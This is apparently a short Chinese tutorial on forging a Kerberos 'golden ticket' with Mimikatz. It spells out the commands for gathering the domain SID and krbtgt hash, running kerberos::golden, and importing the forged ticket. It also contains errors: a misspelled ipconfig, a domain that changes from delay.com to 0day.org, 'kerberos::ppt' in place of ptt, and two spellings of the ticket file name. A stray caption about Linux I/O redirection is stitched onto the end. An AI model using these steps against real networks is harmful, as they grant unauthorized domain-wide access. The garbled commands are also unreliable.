黄金票据:
在AS-REP里面的ticket的encpart是使用krbtgt的hash进行加密,如果拥有krbtgt的hash就可以给我们自己签发任意用户的TGT票据,这个票据称之为黄金票据
使用Mimikatz伪造Kerberos黄金票据
Mimikatz命令:Kerberos:Golden用于创建“黄金票据”(伪造TGT身份验证票证)
首先获取域名:ipnconfig /all
域:delay.com
域的SID值
执行 whoami /all
获取 krbtgt 的hash值
在域用户的主机上执行
kerberos::golden /admin:administrator /domain:0day.org /sid:S-1-5-21-2756371121-2868759905-3853650604 /krbtgt:82dfc71b72a11ef37d663047bc2088fb /ticket:2.kiribi
成功
把 2.kribi 利用mimikatz 进行导入
kerberos::purge #清空已有票据kerberos::ppt 2.kiribi #导入票据kerberos::list # 查看票据
最后验证即可
![[Linux]基础IO(中)---理解重定向与系统调用dup2的使用、缓冲区的意义](https://img-blog.csdnimg.cn/direct/fc8519add14c458cb03970dac1614f34.png)
